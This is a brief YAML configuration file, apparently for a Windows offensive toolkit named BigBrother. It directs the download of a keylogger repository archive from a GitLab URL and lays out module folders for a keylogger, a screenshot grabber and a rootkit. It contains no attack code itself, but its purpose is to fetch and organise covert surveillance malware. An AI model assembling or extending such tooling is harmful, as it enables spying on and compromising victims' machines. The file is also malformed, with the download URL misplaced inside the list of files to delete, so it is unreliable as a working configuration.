---
download_repositories:
  - name: windows_api
    path: windows/anagenesis/katascopos/keylogger
file_to_delete:
  - README.md
  - LICENSE
  - CHANGELOG.md
    url: https://gitlab.com/PhantomGhosts/Windows_api-Keylogger/repository/archive.tar.gz?ref=master
main_directory: /usr/share/BigBrother
module_directories:
  - modules
module_directories_subfolders:
  - windows
  - windows/anagenesis
  - windows/aytogenesis
  - windows/paragenesis
  - windows/anagenesis/anacrypsis
  - windows/anagenesis/katascopos
  - windows/anagenesis/ypnokratos
  - windows/anagenesis/katascopos/keylogger
  - windows/anagenesis/katascopos/screenshoter
  - windows/anagenesis/ypnokratos/rootkit
python_modules_needed:
  - requests
  - shlex
...
